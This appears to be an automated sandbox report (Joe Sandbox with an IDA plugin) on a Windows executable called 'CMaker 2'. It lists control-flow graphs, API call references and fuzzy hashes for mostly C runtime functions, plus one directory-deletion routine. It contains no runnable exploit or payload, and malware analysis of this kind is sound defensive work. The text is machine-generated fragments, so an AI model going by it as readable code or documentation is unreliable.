7ff6fabfaa7c _get_daylight 11 API calls 17372->17375 17373->17374 17376 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17374->17376 17377 7ff6fabfae30 17375->17377 17376->17362 17378 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17377->17378 17378->17367 17402 7ff6fac02334 17379->17402 17381 7ff6fac020f9 17417 7ff6fac01dc4 17381->17417 17384 7ff6fac02116 17384->17316 17385 7ff6fabfd444 _fread_nolock 12 API calls 17386 7ff6fac02127 17385->17386 17387 7ff6fac0212f 17386->17387 17389 7ff6fac0213e 17386->17389 17388 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17387->17388 17388->17384 17389->17389 17424 7ff6fac0246c 17389->17424 17392 7ff6fac0223a 17393 7ff6fabfb108 _get_daylight 11 API calls 17392->17393 17394 7ff6fac0223f 17393->17394 17397 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17394->17397 17395 7ff6fac02295 17396 7ff6fac022fc 17395->17396 17435 7ff6fac01bf4 17395->17435 17400 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17396->17400 17397->17384 17398 7ff6fac02254 17398->17395 17401 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17398->17401 17400->17384 17401->17395 17403 7ff6fac02357 17402->17403 17404 7ff6fac02361 17403->17404 17450 7ff6fac001d8 EnterCriticalSection 17403->17450 17408 7ff6fac023d3 17404->17408 17409 7ff6fabfa08c __CxxCallCatchBlock 45 API calls 17404->17409 17408->17381 17411 7ff6fac023eb 17409->17411 17413 7ff6fac02442 17411->17413 17414 7ff6fabfada4 50 API calls 17411->17414 17413->17381 17415 7ff6fac0242c 17414->17415 17416 7ff6fac020c4 65 API calls 17415->17416 17416->17413 17418 7ff6fabf4c38 45 API calls 17417->17418 17419 7ff6fac01dd8 17418->17419 17420 7ff6fac01de4 GetOEMCP 17419->17420 17421 7ff6fac01df6 17419->17421 17422 7ff6fac01e0b 17420->17422 17421->17422 17423 7ff6fac01dfb GetACP 17421->17423 17422->17384 17422->17385 17423->17422 17425 7ff6fac01dc4 
47 API calls 17424->17425 17426 7ff6fac02499 17425->17426 17427 7ff6fac025ef 17426->17427 17429 7ff6fac024d6 IsValidCodePage 17426->17429 17434 7ff6fac024f0 memcpy_s 17426->17434 17428 7ff6fabea9b0 _log10_special 8 API calls 17427->17428 17430 7ff6fac02231 17428->17430 17429->17427 17431 7ff6fac024e7 17429->17431 17430->17392 17430->17398 17432 7ff6fac02516 GetCPInfo 17431->17432 17431->17434 17432->17427 17432->17434 17434->17434 17451 7ff6fac01edc 17434->17451 17538 7ff6fac001d8 EnterCriticalSection 17435->17538 17452 7ff6fac01f19 GetCPInfo 17451->17452 17453 7ff6fac0200f 17451->17453 17452->17453 17459 7ff6fac01f2c 17452->17459 17454 7ff6fabea9b0 _log10_special 8 API calls 17453->17454 17455 7ff6fac020ae 17454->17455 17455->17427 17462 7ff6fac02c40 17459->17462 17463 7ff6fabf4c38 45 API calls 17462->17463 17464 7ff6fac02c82 17463->17464 17482 7ff6fabff7a0 17464->17482 17484 7ff6fabff7a9 MultiByteToWideChar 17482->17484 17540 7ff6fabf8f05 17539->17540 17541 7ff6fabf9069 17539->17541 17540->17355 17542 7ff6fabf9092 17541->17542 17544 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17541->17544 17543 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17542->17543 17543->17540 17544->17541 17546 7ff6fac063c0 17545->17546 17547 7ff6fac063a9 17545->17547 17546->17547 17550 7ff6fac063ce 17546->17550 17548 7ff6fabfb108 _get_daylight 11 API calls 17547->17548 17549 7ff6fac063ae 17548->17549 17551 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 17549->17551 17552 7ff6fabf4c38 45 API calls 17550->17552 17553 7ff6fac063b9 17550->17553 17551->17553 17552->17553 17553->17166 17555 7ff6fabf4c38 45 API calls 17554->17555 17556 7ff6fac09059 17555->17556 17559 7ff6fac08cb0 17556->17559 17561 7ff6fac08cfe 17559->17561 17560 7ff6fabea9b0 _log10_special 8 API calls 17562 7ff6fac07265 17560->17562 17563 7ff6fac08d85 17561->17563 17565 7ff6fac08d70 GetCPInfo 17561->17565 17568 7ff6fac08d89 17561->17568 17562->17166 17562->17191 
17564 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17563->17564 17563->17568 17566 7ff6fac08e1d 17564->17566 17565->17563 17565->17568 17567 7ff6fabfd444 _fread_nolock 12 API calls 17566->17567 17566->17568 17569 7ff6fac08e54 17566->17569 17567->17569 17568->17560 17569->17568 17570 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17569->17570 17571 7ff6fac08ec2 17570->17571 17572 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17571->17572 17581 7ff6fac08fa4 17571->17581 17574 7ff6fac08ee8 17572->17574 17573 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17573->17568 17575 7ff6fabfd444 _fread_nolock 12 API calls 17574->17575 17576 7ff6fac08f15 17574->17576 17574->17581 17575->17576 17577 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17576->17577 17576->17581 17578 7ff6fac08f8c 17577->17578 17579 7ff6fac08fac 17578->17579 17580 7ff6fac08f92 17578->17580 17588 7ff6fabfee54 17579->17588 17580->17581 17583 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17580->17583 17581->17568 17581->17573 17583->17581 17585 7ff6fac08feb 17585->17568 17587 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17585->17587 17586 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17586->17585 17587->17568 17589 7ff6fabfebfc __crtLCMapStringW 5 API calls 17588->17589 17590 7ff6fabfee92 17589->17590 17591 7ff6fabff0bc __crtLCMapStringW 5 API calls 17590->17591 17593 7ff6fabfee9a 17590->17593 17592 7ff6fabfef03 CompareStringW 17591->17592 17592->17593 17593->17585 17593->17586 17595 7ff6fabfebfc __crtLCMapStringW 5 API calls 17594->17595 17596 7ff6fabfee30 17595->17596 17596->17196 17598 7ff6fabf52f2 17597->17598 17599 7ff6fabf5316 17597->17599 17603 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17598->17603 17606 7ff6fabf5301 17598->17606 17600 7ff6fabf5370 17599->17600 17601 7ff6fabf531b 17599->17601 17602 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 
17600->17602 17604 7ff6fabf5330 17601->17604 17601->17606 17607 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17601->17607 17614 7ff6fabf538c 17602->17614 17603->17606 17608 7ff6fabfd444 _fread_nolock 12 API calls 17604->17608 17605 7ff6fabf5393 GetLastError 17609 7ff6fabfb07c _fread_nolock 11 API calls 17605->17609 17606->17199 17606->17200 17607->17604 17608->17606 17612 7ff6fabf53a0 17609->17612 17610 7ff6fabf53ce 17610->17606 17611 7ff6fabff7a0 _fread_nolock MultiByteToWideChar 17610->17611 17615 7ff6fabf5412 17611->17615 17616 7ff6fabfb108 _get_daylight 11 API calls 17612->17616 17613 7ff6fabf53c1 17618 7ff6fabfd444 _fread_nolock 12 API calls 17613->17618 17614->17605 17614->17610 17614->17613 17617 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17614->17617 17615->17605 17615->17606 17616->17606 17617->17613 17618->17610 17620 7ff6fabf8de1 17619->17620 17627 7ff6fabf8ddd 17619->17627 17640 7ff6fac0283c GetEnvironmentStringsW 17620->17640 17623 7ff6fabf8dee 17625 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17623->17625 17624 7ff6fabf8dfa 17647 7ff6fabf8f48 17624->17647 17625->17627 17627->17230 17632 7ff6fabf9188 17627->17632 17629 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17630 7ff6fabf8e21 17629->17630 17631 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17630->17631 17631->17627 17633 7ff6fabf91ab 17632->17633 17634 7ff6fabf91c2 17632->17634 17633->17230 17634->17633 17635 7ff6fabfeb84 _get_daylight 11 API calls 17634->17635 17636 7ff6fabf9236 17634->17636 17637 7ff6fabff7a0 MultiByteToWideChar _fread_nolock 17634->17637 17639 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17634->17639 17635->17634 17638 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17636->17638 17637->17634 17638->17633 17639->17634 17641 7ff6fabf8de6 17640->17641 17642 7ff6fac02860 
17640->17642 17641->17623 17641->17624 17643 7ff6fabfd444 _fread_nolock 12 API calls 17642->17643 17644 7ff6fac02897 memcpy_s 17643->17644 17645 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17644->17645 17646 7ff6fac028b7 FreeEnvironmentStringsW 17645->17646 17646->17641 17648 7ff6fabf8f70 17647->17648 17649 7ff6fabfeb84 _get_daylight 11 API calls 17648->17649 17662 7ff6fabf8fab 17649->17662 17650 7ff6fabf8fb3 17651 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17650->17651 17652 7ff6fabf8e02 17651->17652 17652->17629 17653 7ff6fabf902d 17654 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17653->17654 17654->17652 17655 7ff6fabfeb84 _get_daylight 11 API calls 17655->17662 17656 7ff6fabf901c 17657 7ff6fabf9064 11 API calls 17656->17657 17659 7ff6fabf9024 17657->17659 17658 7ff6fac00374 37 API calls 17658->17662 17660 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17659->17660 17660->17650 17661 7ff6fabf9050 17663 7ff6fabfa4c4 _isindst 17 API calls 17661->17663 17662->17650 17662->17653 17662->17655 17662->17656 17662->17658 17662->17661 17664 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17662->17664 17665 7ff6fabf9062 17663->17665 17664->17662 17667 7ff6fac08c19 __crtLCMapStringW 17666->17667 17668 7ff6fac0714e 17667->17668 17669 7ff6fabfee54 6 API calls 17667->17669 17668->17254 17668->17255 17669->17668 17670 7ff6fabe9f50 17671 7ff6fabe9f7e 17670->17671 17672 7ff6fabe9f65 17670->17672 17672->17671 17674 7ff6fabfd444 12 API calls 17672->17674 17673 7ff6fabe9fde 17674->17673 20836 7ff6fabfab50 20837 7ff6fabfab55 20836->20837 20838 7ff6fabfab6a 20836->20838 20842 7ff6fabfab70 20837->20842 20843 7ff6fabfabb2 20842->20843 20844 7ff6fabfabba 20842->20844 20845 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20843->20845 20846 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 
20844->20846 20845->20844 20847 7ff6fabfabc7 20846->20847 20848 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20847->20848 20849 7ff6fabfabd4 20848->20849 20850 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20849->20850 20851 7ff6fabfabe1 20850->20851 20852 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20851->20852 20853 7ff6fabfabee 20852->20853 20854 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20853->20854 20855 7ff6fabfabfb 20854->20855 20856 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20855->20856 20857 7ff6fabfac08 20856->20857 20858 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20857->20858 20859 7ff6fabfac15 20858->20859 20860 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20859->20860 20861 7ff6fabfac25 20860->20861 20862 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20861->20862 20863 7ff6fabfac35 20862->20863 20868 7ff6fabfaa1c 20863->20868 20882 7ff6fac001d8 EnterCriticalSection 20868->20882 20888 7ff6fabf9950 20891 7ff6fabf98c8 20888->20891 20898 7ff6fac001d8 EnterCriticalSection 20891->20898 20559 7ff6fac0acdc 20560 7ff6fac0acec 20559->20560 20563 7ff6fabf4f88 LeaveCriticalSection 20560->20563 20990 7ff6fac0126c 21008 7ff6fac001d8 EnterCriticalSection 20990->21008 21009 7ff6fac0ae62 21012 7ff6fabf4f88 LeaveCriticalSection 21009->21012

Control-flow Graph

control_flow_graph 330 7ff6fac05b00-7ff6fac05b3b call 7ff6fac05488 call 7ff6fac05490 call 7ff6fac054f8 337 7ff6fac05d65-7ff6fac05db1 call 7ff6fabfa4c4 call 7ff6fac05488 call 7ff6fac05490 call 7ff6fac054f8 330->337 338 7ff6fac05b41-7ff6fac05b4c call 7ff6fac05498 330->338 363 7ff6fac05eef-7ff6fac05f5d call 7ff6fabfa4c4 call 7ff6fac01384 337->363 364 7ff6fac05db7-7ff6fac05dc2 call 7ff6fac05498 337->364 338->337 344 7ff6fac05b52-7ff6fac05b5c 338->344 346 7ff6fac05b7e-7ff6fac05b82 344->346 347 7ff6fac05b5e-7ff6fac05b61 344->347 348 7ff6fac05b85-7ff6fac05b8d 346->348 350 7ff6fac05b64-7ff6fac05b6f 347->350 348->348 351 7ff6fac05b8f-7ff6fac05ba2 call 7ff6fabfd444 348->351 353 7ff6fac05b71-7ff6fac05b78 350->353 354 7ff6fac05b7a-7ff6fac05b7c 350->354 360 7ff6fac05ba4-7ff6fac05ba6 call 7ff6fabfa0e4 351->360 361 7ff6fac05bba-7ff6fac05bc6 call 7ff6fabfa0e4 351->361 353->350 353->354 354->346 357 7ff6fac05bab-7ff6fac05bb9 354->357 360->357 371 7ff6fac05bcd-7ff6fac05bd5 361->371 384 7ff6fac05f5f-7ff6fac05f66 363->384 385 7ff6fac05f6b-7ff6fac05f6e 363->385 364->363 373 7ff6fac05dc8-7ff6fac05dd3 call 7ff6fac054c8 364->373 371->371 374 7ff6fac05bd7-7ff6fac05be8 call 7ff6fac00374 371->374 373->363 382 7ff6fac05dd9-7ff6fac05dfc call 7ff6fabfa0e4 GetTimeZoneInformation 373->382 374->337 383 7ff6fac05bee-7ff6fac05c44 call 7ff6fac0a5b0 * 4 call 7ff6fac05a1c 374->383 400 7ff6fac05ec4-7ff6fac05eee call 7ff6fac05480 call 7ff6fac05470 call 7ff6fac05478 382->400 401 7ff6fac05e02-7ff6fac05e23 382->401 442 7ff6fac05c46-7ff6fac05c4a 383->442 390 7ff6fac05ffb-7ff6fac05ffe 384->390 386 7ff6fac05fa5-7ff6fac05fb8 call 7ff6fabfd444 385->386 387 7ff6fac05f70 385->387 404 7ff6fac05fc3-7ff6fac05fde call 7ff6fac01384 386->404 405 7ff6fac05fba 386->405 391 7ff6fac05f73 387->391 390->391 392 7ff6fac06004-7ff6fac0600c call 7ff6fac05b00 390->392 396 7ff6fac05f78-7ff6fac05fa4 call 7ff6fabfa0e4 call 7ff6fabea9b0 391->396 397 7ff6fac05f73 call 7ff6fac05d7c 391->397 392->396 397->396 406 7ff6fac05e25-7ff6fac05e2b 401->406 407 7ff6fac05e2e-7ff6fac05e35 401->407 428 7ff6fac05fe5-7ff6fac05ff7 call 7ff6fabfa0e4 404->428 429 7ff6fac05fe0-7ff6fac05fe3 404->429 411 7ff6fac05fbc-7ff6fac05fc1 call 7ff6fabfa0e4 405->411 406->407 412 7ff6fac05e49 407->412 413 7ff6fac05e37-7ff6fac05e3f 407->413 411->387 424 7ff6fac05e4b-7ff6fac05ebf call 7ff6fac0a5b0 * 4 call 7ff6fac0295c call 7ff6fac06014 * 2 412->424 413->412 420 7ff6fac05e41-7ff6fac05e47 413->420 420->424 424->400 428->390 429->411 444 7ff6fac05c50-7ff6fac05c54 442->444 445 7ff6fac05c4c 442->445 444->442 447 7ff6fac05c56-7ff6fac05c7b call 7ff6fabf6978 444->447 445->444 453 7ff6fac05c7e-7ff6fac05c82 447->453 455 7ff6fac05c84-7ff6fac05c8f 453->455 456 7ff6fac05c91-7ff6fac05c95 453->456 455->456 458 7ff6fac05c97-7ff6fac05c9b 455->458 456->453 461 7ff6fac05c9d-7ff6fac05cc5 call 7ff6fabf6978 458->461 462 7ff6fac05d1c-7ff6fac05d20 458->462 469 7ff6fac05ce3-7ff6fac05ce7 461->469 470 7ff6fac05cc7 461->470 463 7ff6fac05d22-7ff6fac05d24 462->463 464 7ff6fac05d27-7ff6fac05d34 462->464 463->464 466 7ff6fac05d4f-7ff6fac05d5e call 7ff6fac05480 call 7ff6fac05470 464->466 467 7ff6fac05d36-7ff6fac05d4c call 7ff6fac05a1c 464->467 466->337 467->466 469->462 475 7ff6fac05ce9-7ff6fac05d07 call 7ff6fabf6978 469->475 473 7ff6fac05cca-7ff6fac05cd1 470->473 473->469 477 7ff6fac05cd3-7ff6fac05ce1 473->477 482 7ff6fac05d13-7ff6fac05d1a 475->482 477->469 477->473 482->462 483 7ff6fac05d09-7ff6fac05d0d 482->483 483->462 484 7ff6fac05d0f 483->484 484->482
APIs
• _get_daylight.LIBCMT ref: 00007FF6FAC05B45
  • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
  • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
  • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
  • Part of subcall function 00007FF6FABFA4C4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4CD
  • Part of subcall function 00007FF6FABFA4C4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4F2
• _get_daylight.LIBCMT ref: 00007FF6FAC05B34
  • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
• _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
• _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
• _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 4070488512-239921721
• Opcode ID: 87b467ba01405d4ab23210905a1548530960517e986d068784f96916153947de
• Instruction ID: 574d03f9573c635930e5239bb9b16b5f15e172ee570f051b444e3a155a97edbd
• Opcode Fuzzy Hash: 87b467ba01405d4ab23210905a1548530960517e986d068784f96916153947de
• Instruction Fuzzy Hash: 97D1E0A6A1824686EB20DF25D4901B967B8FF84B84F84E076EA6DC76D5FF3CE441C740

Control-flow Graph

control_flow_graph 574 7ff6fac06a4c-7ff6fac06abf call 7ff6fac06780 577 7ff6fac06ac1-7ff6fac06aca call 7ff6fabfb0e8 574->577 578 7ff6fac06ad9-7ff6fac06ae3 call 7ff6fabf80d4 574->578 583 7ff6fac06acd-7ff6fac06ad4 call 7ff6fabfb108 577->583 584 7ff6fac06ae5-7ff6fac06afc call 7ff6fabfb0e8 call 7ff6fabfb108 578->584 585 7ff6fac06afe-7ff6fac06b67 CreateFileW 578->585 601 7ff6fac06e1a-7ff6fac06e3a 583->601 584->583 586 7ff6fac06be4-7ff6fac06bef GetFileType 585->586 587 7ff6fac06b69-7ff6fac06b6f 585->587 593 7ff6fac06c42-7ff6fac06c49 586->593 594 7ff6fac06bf1-7ff6fac06c2c GetLastError call 7ff6fabfb07c CloseHandle 586->594 590 7ff6fac06bb1-7ff6fac06bdf GetLastError call 7ff6fabfb07c 587->590 591 7ff6fac06b71-7ff6fac06b75 587->591 590->583 591->590 599 7ff6fac06b77-7ff6fac06baf CreateFileW 591->599 597 7ff6fac06c51-7ff6fac06c54 593->597 598 7ff6fac06c4b-7ff6fac06c4f 593->598 594->583 609 7ff6fac06c32-7ff6fac06c3d call 7ff6fabfb108 594->609 604 7ff6fac06c5a-7ff6fac06caf call 7ff6fabf7fec 597->604 605 7ff6fac06c56 597->605 598->604 599->586 599->590 612 7ff6fac06cb1-7ff6fac06cbd call 7ff6fac06988 604->612 613 7ff6fac06cce-7ff6fac06cff call 7ff6fac06500 604->613 605->604 609->583 612->613 621 7ff6fac06cbf 612->621 619 7ff6fac06d05-7ff6fac06d47 613->619 620 7ff6fac06d01-7ff6fac06d03 613->620 623 7ff6fac06d69-7ff6fac06d74 619->623 624 7ff6fac06d49-7ff6fac06d4d 619->624 622 7ff6fac06cc1-7ff6fac06cc9 call 7ff6fabfa648 620->622 621->622 622->601 626 7ff6fac06d7a-7ff6fac06d7e 623->626 627 7ff6fac06e18 623->627 624->623 625 7ff6fac06d4f-7ff6fac06d64 624->625 625->623 626->627 629 7ff6fac06d84-7ff6fac06dc9 CloseHandle CreateFileW 626->629 627->601 631 7ff6fac06dfe-7ff6fac06e13 629->631 632 7ff6fac06dcb-7ff6fac06df9 GetLastError call 7ff6fabfb07c call 7ff6fabf8214 629->632 631->627 632->631
APIs
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
• Instruction ID: 0f5ea9560eb0f925106174c7a36dd0a7adb4d7ab6b2d4c5e30e5c30f37ae0354
• Opcode Fuzzy Hash: ad8ec9179d343e41af190c9267fc60de618bf9d8d7a5f79036b78aa83a48160c
• Instruction Fuzzy Hash: F4C1C276B28A4185EB10CFA8C4906AC3771EB49BA8B059279DE6ED77D4EF38D055C300

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 7e4a40b963a684cd287bf4d382916e0c44b20c37e6793a520649104d512158ac
• Instruction ID: e2c0f25f5076c5409287d8e48269d475fa46c619c7e9588e876b3a64e4750f28
• Opcode Fuzzy Hash: 7e4a40b963a684cd287bf4d382916e0c44b20c37e6793a520649104d512158ac
• Instruction Fuzzy Hash: 40413E61A0CA4281EB609B24E4A42B97360FB95754F8046B2E9BEC37D4FF3CE54AC700

Control-flow Graph

control_flow_graph 863 7ff6fac05d7c-7ff6fac05db1 call 7ff6fac05488 call 7ff6fac05490 call 7ff6fac054f8 870 7ff6fac05eef-7ff6fac05f5d call 7ff6fabfa4c4 call 7ff6fac01384 863->870 871 7ff6fac05db7-7ff6fac05dc2 call 7ff6fac05498 863->871 883 7ff6fac05f5f-7ff6fac05f66 870->883 884 7ff6fac05f6b-7ff6fac05f6e 870->884 871->870 876 7ff6fac05dc8-7ff6fac05dd3 call 7ff6fac054c8 871->876 876->870 882 7ff6fac05dd9-7ff6fac05dfc call 7ff6fabfa0e4 GetTimeZoneInformation 876->882 897 7ff6fac05ec4-7ff6fac05eee call 7ff6fac05480 call 7ff6fac05470 call 7ff6fac05478 882->897 898 7ff6fac05e02-7ff6fac05e23 882->898 888 7ff6fac05ffb-7ff6fac05ffe 883->888 885 7ff6fac05fa5-7ff6fac05fb8 call 7ff6fabfd444 884->885 886 7ff6fac05f70 884->886 900 7ff6fac05fc3-7ff6fac05fde call 7ff6fac01384 885->900 901 7ff6fac05fba 885->901 889 7ff6fac05f73 886->889 888->889 890 7ff6fac06004-7ff6fac0600c call 7ff6fac05b00 888->890 893 7ff6fac05f78-7ff6fac05fa4 call 7ff6fabfa0e4 call 7ff6fabea9b0 889->893 894 7ff6fac05f73 call 7ff6fac05d7c 889->894 890->893 894->893 902 7ff6fac05e25-7ff6fac05e2b 898->902 903 7ff6fac05e2e-7ff6fac05e35 898->903 921 7ff6fac05fe5-7ff6fac05ff7 call 7ff6fabfa0e4 900->921 922 7ff6fac05fe0-7ff6fac05fe3 900->922 906 7ff6fac05fbc-7ff6fac05fc1 call 7ff6fabfa0e4 901->906 902->903 907 7ff6fac05e49 903->907 908 7ff6fac05e37-7ff6fac05e3f 903->908 906->886 917 7ff6fac05e4b-7ff6fac05ebf call 7ff6fac0a5b0 * 4 call 7ff6fac0295c call 7ff6fac06014 * 2 907->917 908->907 914 7ff6fac05e41-7ff6fac05e47 908->914 914->917 917->897 921->888 922->906
APIs
• _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
  • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
• _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
  • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
• _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
  • Part of subcall function 00007FF6FAC054C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054DC
  • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
  • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
